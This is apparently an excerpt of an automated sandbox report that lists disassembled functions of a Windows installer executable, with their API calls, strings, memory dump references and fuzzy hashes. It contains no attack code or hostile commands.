                                                                            Function 0041B31C Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B333
                                                                            • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B33D
                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B34F
                                                                            • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B366
                                                                            • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B372
                                                                            • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B39F
                                                                            • 73A0A480.USER32(00000000,00000000,0041B3D2,00000000,0041B3CB,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                            • DeleteDC.GDI32(?), ref: 0041B449
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                            • String ID:
                                                                            • API String ID: 3135053572-0
                                                                            • Opcode ID: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                            • Instruction ID: ef99a8f9a6f00624a9096b2aeeb37702e3b70ceb3a8cbf3cb68c8f3869cb2bd7
                                                                            • Opcode Fuzzy Hash: e420a80018f5a27581da0c94fb8e2332c520fd2d58b05de39de388c6394c4d5d
                                                                            • Instruction Fuzzy Hash: 1541D071E40619AFDF10DAE9D846FEFB7BCEF08704F104466B614FB281C67869408BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046E3C8 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 317COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046E55B
                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046E64E
                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0046E664
                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046E689
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                            • API String ID: 971782779-3668018701
                                                                            • Opcode ID: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                            • Instruction ID: dad63e880d71d64191cbb6a8ee4696ca6eb4502e54dc837f5c65c8de11b949a7
                                                                            • Opcode Fuzzy Hash: 7233d68e5e0cd7d80ba07986dc8d0c7cf2e1d0277f99ac3aa031ea8fdea09f1a
                                                                            • Instruction Fuzzy Hash: A5D13474A00249AFDB01EF99D885BDEBBF5AF08314F54402AF800B7391D778AE45CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004530B4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,?,00000000,?,00000000,0045334D,?,00458E8E,00000003,00000000,00000000,00453384), ref: 004531CD
                                                                              • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453251
                                                                            • RegQueryValueExA.ADVAPI32(00458E8E,00000000,00000000,00000000,?,00000004,00000000,00453297,?,00458E8E,00000000,00000000,?,00000000,?,00000000), ref: 00453280
                                                                            Strings
                                                                            • RegOpenKeyEx, xrefs: 00453150
                                                                            • , xrefs: 0045313E
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004530EB
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453124
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2812809588-1577016196
                                                                            • Opcode ID: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                            • Instruction ID: 9b4ba10c22eae4ee7854298b287fdc99132420248117da062c6f054c990cd466
                                                                            • Opcode Fuzzy Hash: 5672ad8e2cc117f4e8176355555f5365562b113b61d1c3d615d0baec73026090
                                                                            • Instruction Fuzzy Hash: 90911371D04608ABDB11DFA5C941BDEB7B9EB48346F50407BF900F7282D6789F098B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00456E50 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?), ref: 00456E87
                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00456EA3
                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00456EB1
                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00456EC2
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F09
                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00456F25
                                                                            Strings
                                                                            • Helper process exited, but failed to get exit code., xrefs: 00456EFB
                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00456EEF
                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00456E79
                                                                            • Helper isn't responding; killing it., xrefs: 00456E93
                                                                            • Helper process exited., xrefs: 00456ED1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                            • API String ID: 3355656108-1243109208
                                                                            • Opcode ID: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                            • Instruction ID: e3dcae7ee27b0c74354dd39b82ec863519094067a73f9fae9ec07b4aeacd6428
                                                                            • Opcode Fuzzy Hash: 44f830463b6b98ffcd0b5fc49b811d69bbadb2fca0106d1d9bde81c82a2268c6
                                                                            • Instruction Fuzzy Hash: 09217171A047019AC720EB79D44575BB6E49F08309F41CC2FF99ACB283D77CE8488B2A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00452D68 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452E8F
                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F3F,?,00000000,00453003), ref: 00452FCB
                                                                              • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DA7
                                                                            • RegCreateKeyEx, xrefs: 00452E03
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452DD7
                                                                            • , xrefs: 00452DF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2481121983-1280779767
                                                                            • Opcode ID: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                            • Instruction ID: bd46e7fedae0378ea69e291eeb16b1e61bf49070ab8af015702d395f50882908
                                                                            • Opcode Fuzzy Hash: 992b1da2950830ab92792e8627ea11dc1cb8e96db011ddc3e5931f01e7172f02
                                                                            • Instruction Fuzzy Hash: D281F076A00209AFDB00DFD5D941BEEB7B9EB49305F50442BF900F7282D778AA05DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00490B70 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00452240: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045232F
                                                                              • Part of subcall function 00452240: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,AI,_iu,?,00000000,0045237A), ref: 0045233F
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00490BED
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00490D41), ref: 00490C0E
                                                                            • CreateWindowExA.USER32(00000000,STATIC,00490D50,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00490C35
                                                                            • SetWindowLongA.USER32(?,000000FC,004903C8), ref: 00490C48
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC,00490D50), ref: 00490C78
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00490CEC
                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000), ref: 00490CF8
                                                                              • Part of subcall function 00452590: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                            • 73A15CF0.USER32(?,00490D1B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00490D14,?,?,000000FC,004903C8,00000000,STATIC), ref: 00490D0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                            • API String ID: 170458502-2312673372
                                                                            • Opcode ID: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                            • Instruction ID: 92ce551481e6a002572db3822da7cd140e35cf2137eba75a76cf686200e2178a
                                                                            • Opcode Fuzzy Hash: 3291ae40cca8e639a2fa3575d7386dd73fdd352732615bf7961a12fc9ded30d9
                                                                            • Instruction Fuzzy Hash: EE414371A44208AFDF10EBA5DC42F9E7BF8EB09704F514576F510F7291D6799E008BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042EA7C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042EA88
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EA9C
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EAA9
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EAB6
                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042EB02
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042EB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                            • Instruction ID: 33f08c3eecf59c1efe6da1d62cafc2865f84f18ea85c38477b96760789069036
                                                                            • Opcode Fuzzy Hash: 372781250b5e26a90a536cdab21d6e8fb85424a4b2df6cc7dc4c1284726dc8a7
                                                                            • Instruction Fuzzy Hash: 9721D4B67017246FD300DA69DC81F3B7B98DB84714F09462AF945DB381DA78EC008A59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045EEF0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0045EEFC
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045EF10
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045EF1D
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045EF2A
                                                                            • GetWindowRect.USER32(?,00000000), ref: 0045EF76
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045EFB4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                            • Instruction ID: 495c241bec279fa6e8d852d727b900aa08f5c3bdd79c5966852e86187c859b95
                                                                            • Opcode Fuzzy Hash: e45decf36f7f589e9402f4798f3bd4f8d6fcd5a60320c5862763d4d4f52b0346
                                                                            • Instruction Fuzzy Hash: EE21C2B2205604BFD2049669CC81F3B7799DB84711F09452AFD44DB3C2DA78ED098A99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00457028 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00457207,?,00000000,0045726A,?,?,021E3858,00000000), ref: 00457085
                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570E2
                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000,00000001,00000000,00000000,00000000,00457207), ref: 004570EF
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045713B
                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000), ref: 00457161
                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00457175,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,0045719C,?,00000000), ref: 00457168
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                            • API String ID: 2182916169-3012584893
                                                                            • Opcode ID: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                            • Instruction ID: 6afc82d78c4e6d9526045151df1525e73fa02dd6a17213aad7cd5d98e3565ae3
                                                                            • Opcode Fuzzy Hash: 38f21b6de1c3782b685d2c0af9f28be416f44e06874f6bb5035634e2dcc68750
                                                                            • Instruction Fuzzy Hash: BC418F70A04608AFDB15DFA5DD81FAEB7F9EB08710F1040B6F904E7392D6789E44CA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00454D80 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00454EE5,?,?,00000031,?), ref: 00454DA8
                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00454DAE
                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00454DFB
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                            • API String ID: 1914119943-2711329623
                                                                            • Opcode ID: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                            • Instruction ID: 2bf04720efcd21e73fda0c956b895e5846be94a4420347b52386e37effde86e0
                                                                            • Opcode Fuzzy Hash: 10a434107409ef4988e99fdf2a40fccf44bc0ac8e46ad230c6e42fc229f0afa3
                                                                            • Instruction Fuzzy Hash: 1F319271A00604AFC701EFAACC52D5BB7BEFBC87097118466FD04DB652DA38DD44C628
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E274 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0042E29D
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-2401316094
                                                                            • Opcode ID: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                            • Instruction ID: 4ee60a07781906a8a0ffae9c6e5e5ebe2969662c9c3675aa1be84450fad3e8b0
                                                                            • Opcode Fuzzy Hash: d045098ef34200c22202e99a4145b28dd45ddec826700b532d9b98b58edb8012
                                                                            • Instruction Fuzzy Hash: 87214630B00215EBDB00EAA7DC51B9F77A9EB04315FD04477A900E7281DB7CAE05DB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00416CF0 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RectVisible.GDI32(?,?), ref: 00416D83
                                                                            • SaveDC.GDI32(?), ref: 00416D97
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
                                                                            • RestoreDC.GDI32(?,?), ref: 00416DD5
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416E55
                                                                            • FrameRect.USER32(?,?,?), ref: 00416E88
                                                                            • DeleteObject.GDI32(?), ref: 00416E92
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EA2
                                                                            • FrameRect.USER32(?,?,?), ref: 00416ED5
                                                                            • DeleteObject.GDI32(?), ref: 00416EDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                            • String ID:
                                                                            • API String ID: 375863564-0
                                                                            • Opcode ID: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                            • Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
                                                                            • Opcode Fuzzy Hash: 1df63080f967596adf43ebdb9d67fdccf49ab23e9096a25037667f73de04663f
                                                                            • Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
